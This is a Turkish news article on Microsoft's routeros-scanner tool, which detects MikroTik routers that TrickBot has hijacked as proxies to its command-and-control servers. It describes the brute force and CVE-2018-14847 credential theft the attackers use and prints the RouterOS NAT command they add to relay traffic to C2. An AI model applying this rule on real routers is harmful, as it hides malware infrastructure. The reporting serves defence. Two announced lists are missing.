Microsoft, MikroTik Cihazlar İçin TrickBot Tool Yayınladı

Microsoft, TrickBot saldırganları tarafından saldırıya uğrayan MikroTik yönlendiricileri command ve control server’lar için proxy görevi gören bir tarayıcı yayınladı. TrickBot yıllardır, virüslü cihaz ile command ve control server (C2) arasında bir proxy görevi görmek için yönlendiriciler gibi IoT cihazlarını kullandı. Bu proxy’ler, araştırmacıların ve kolluk kuvvetlerinin command ve control altyapılarını bulmasını ve bozmasını önlemek için kullanılıyor.

Kötü amaçlı trafiği yönlendirme

TrickBot operasyonları, MikroTik yönlendiricileri hacklerken, varsayılan kimlik bilgilerini kullanarak ve ardından parolayı tahmin etmek için brute force gibi çeşitli yöntemler kullanıyor. Bu ilk yöntemler ile yönlendiriciye erişim sağlamadıysa saldırganlar, rastgele dosyaları okumasına izin veren kritik directory traversal vulnerability güvenlik açığı olan CVE-2018-14847’den yararlanmaya çalışıyor.Bu güvenlik açığından yararlanan saldırgan, yönlendirici kullanıcı kimlik bilgilerini içeren ‘user.dat’ dosyasını çalabilir. Cihaza erişim sağladıktan sonra, 449 numaralı bağlantı noktasına gönderilen trafiği yeniden yönlendiren bir ağ adresi çevirisi (NAT) kuralı oluşturmak için yerleşik ‘/ip’, ‘/system’ veya ‘/tool’ komutlarını kullanıyorlar.

/ip firewall nat add chain=dstnat proto=tcp dst-port=449 to-port=80 action=dst-nat to-addresses=[infected device] dst-address=[real C2 address]

Bu IP NAT kuralını kullanarak, C2 sunucuları doğrudan tehdit analizine maruz kalmaz, ancak yine de virüslü cihazlar için iletişime izin verir.

Güvenlik yükseltmeleri yıllardır mevcut olmasına rağmen hala güncelleme yapılmamış cihazlar bulunmakta ve MikroTik cihazlarının sahiplerinden defalarca 6.45.6’dan daha yeni RouterOS sürümlerine yükseltmeleri istendi.

Microsoft, MikroTik cihazlarını TrickBot tarafından ele geçirildiğine taramak için kullanabileceği ‘ routeros-scanner ‘ adlı araç yayınladı.

Yayınlanan script, aşağıdaki bilgiler için MikroTik cihazlarını tarayacaktır:

Microsoft, MikroTik cihazlarında daha fazla güvenlik sağlamak için aşağıdaki adımların uygulanmasını öneriyor:

Kaynak: bleepingcomputer.com

Exit mobile version